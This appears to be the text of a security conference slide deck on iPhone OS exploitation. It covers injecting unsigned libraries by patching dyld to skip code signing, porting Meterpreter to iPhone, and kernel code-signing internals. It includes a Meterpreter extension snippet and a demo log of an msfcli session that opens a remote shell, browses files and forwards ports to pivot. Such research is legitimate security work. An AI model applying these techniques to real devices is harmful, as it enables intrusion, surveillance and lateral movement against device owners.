We can run our shellcode now
The shellcode could do anything you care to make it do
Higher level payloads would be cooler
If we could load an unsigned library, that would be nice!
Since we’re already running, we can muck with the local
copy of dyld, the dynamic loader (using the same trick we
used to get our code running)
40. Mapping a library
Map injected library upon an already mapped (signed)
library
Each segment we vm_protect RW, write, then
vm_protect to the expected permissions
At this point library is mapped, but not linked
41. Linking
On Mac OS X, there are lots of ways to do this
On iPhone they removed them all :(
Except from one used to load the main binary
We just write the library to disk
Call dlopen on it
And patch dyld to ignore code signing
43. So we’re done?
Not really
When the library is linked it searches for symbols in each
linked library
*each linked library* means even the one we have
overwritten
44. One last patch
Before overwriting the victim library we force dlclose() to
unlink it
To “force” means to ignore the garbage collector for
libraries
We need to be careful tough, some frameworks will crash if
the are forced to be unloaded
46. Patching results
Once our code is running in a signed process we can load
unsigned libraries
These libraries can be written in C, C++, Obj-C, etc
Can do fun things like DDOS, GPS, listening device etc
Or...Meterpreter!
47. Meterpreter
Originally an advanced Metasploit payload for Windows
Bring along your own tools, don’t trust system tools
Stealthier
instead of exec’ing /bin/sh and then /bin/ls, all code runs within the
exploited process
Meterpreter doesn’t appear on disk
Modular: Can upload modules which include additional functionality
Better than a shell
Upload, download, and edit files on the fly
Redirect traffic to other hosts (pivoting)
48. Macterpreter
A Mac OS X port of Meterpreter for Windows
Porting from Mac OS X to iPhone is almost just a recompile
Differences
Monolithic (loading dynamic libraries is hard)
Runs in own thread (watchdog protection)
Can’t exec other programs
49. Adding code is fun (and easy)
#include <AudioToolbox/AudioServices.h>
/*
* Vibrates and plays a sound
*/
DWORD request_fs_vibrate(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD result = ERROR_SUCCESS;
AudioServicesPlaySystemSound(0x3ea);
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result);
packet_transmit(remote, response, NULL);
return ERROR_SUCCESS;
}
50. Code added to Metasploit
Shellcode for bin_tcp
Has to do the “memory trick”
Involves calls to vm_protect, overwritting a loaded library, etc.
~400 bytes
Shellcode for inject_dylib
Has to write dylib to disk, patch dyld, dlopen file
~4000 bytes
51. Demo!
iPhone 2.2.1
Not Jailbroken
Not Development
Using Ad-Hoc distribution
52. /msfcli exploit/osx/test/exploit RHOST=192.168.1.12 RPORT=5555 LPORT=4444 PAYLOAD=osx/armle/meterpreter/
bind_tcp DYLIB=metsrv-combo-phone.dylib AutoLoadStdapi=False E
[*] Started bind handler
[*] Transmitting stage length value...(3884 bytes)
[*] Sending stage (3884 bytes)
[*] Sleeping before handling stage...
[*] Uploading Mach-O dylib (97036 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.25.149:36343 -> 192.168.1.12:4444)
meterpreter > use stdapi
Loading extension stdapi...success.
meterpreter > pwd
/
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
41775/rwxrwxr-x 612 dir Fri Jan 09 16:57:35 -0800 2009 .
41775/rwxrwxr-x 612 dir Fri Jan 09 16:57:35 -0800 2009 ..
40700/rwx------ 170 dir Fri Jan 09 16:38:07 -0800 2009 .fseventsd
40775/rwxrwxr-x 782 dir Fri Jan 09 16:38:33 -0800 2009 Applications
40775/rwxrwxr-x 68 dir Thu Dec 18 20:56:18 -0800 2008 Developer
40775/rwxrwxr-x 680 dir Fri Jan 09 16:38:59 -0800 2009 Library
...
meterpreter > ps
...
43 MobilePhone
344 HelloWorld
meterpreter > vibrate
meterpreter > getpid
Current pid: 344
meterpreter > getuid
Server username: mobile
meterpreter > cat /var/mobile/.forward
/dev/null
meterpreter > portfwd add -l 2222 -p 22 -r 192.168.1.182
[*] Local TCP relay created: 0.0.0.0:2222 <-> 192.168.1.182:22
meterpreter > exit
56. Does the “trick” work?
Worked on jailbroken
Worked on development phone
In fact, you could just go from RW->RX without the trick
Only worked when process was actually being debugged
Can trick it to work all the time if you call ptrace(0,0,0,0)
Doesn’t work on provisioned (or presumably factory) phones :(
Ad-hoc distribution requires “get-task-allow” set to false
Would still work on any binary with this entitlement
They locked down the memory tighter, those bastards!
57. First things first
If we use 2.x trick what happens is that the process is
killed as soon as we try to execute anything on the
page
58. What’s the difference
between the two?
iPhone 2.x iPhone 3.x
vm_protect() PROT_COPY
trick (“act like a XN is not really enforced
debugger”) something cares about
Apparently the kernel “get-task-allow” (can’t “act
doesn’t care about “get- like a debugger”)
task-allow” ptrace() plays a key role
dyld plays a key role
59. Why?
2.xif (m->cs_tainted)
{
kr = KERN_SUCCESS;
if (!cs_enforcement_disable) {
if (cs_invalid_page((addr64_t) vaddr)) {
3.x
if (m->cs_tainted || (prot & VM_PROT_EXECUTE) && !m->cs_validated ))
{
kr = KERN_SUCCESS;
if (!cs_enforcement_disable) {
if (cs_invalid_page((addr64_t) vaddr)) {
60. Why ptrace() should help
setting breakpoints?
Whenever you call ptrace() with PT_TRACE_ME or
PT_ATTACH cs_allow_invalid() is called
cs_allow_invalid() checks if it’s possible to disable code
signing on the pages of a process
cs_allow_invalid() disables code signing on both the
parent process and the child
62. cs_allow_invalid()
It verifies if a MAC policy denies disabling code signing
It checks if cs_debug is set
Eventually it disables process killing and enables
VM_PROT_COPY flag on process pages
66. A few words on MAC
It’s a granular policy system for managing both kernel
space and userspace entities
Policies are encapsulated in kernel modules
Amongst the other things it can hook system calls,
modify memory management behavior
67. How it works in our case
MAC policies list is iterated and it retrieves a function
pointer inside the policy structure
The function it’s called and it performs its checks
If *any* of the functions fails at granting the permission
code signing is not disabled
68. The mysterious functions
So far it appears that only AMFI(Apple Mobile File
Integrity) kext registers a function
It checks if a process has one of the following
entitlements:
get-task-allow
run-invalid-allow
run-unsigned-allow
70. When AMFI registers the
MAC policy
It appears that as soon as a process is created AMFI
registers a MAC policy with information taken from
seatbelt profile and entitlements
Some applications have builtin profiles in the kernel
most notably:
MobileSafari
MobileMail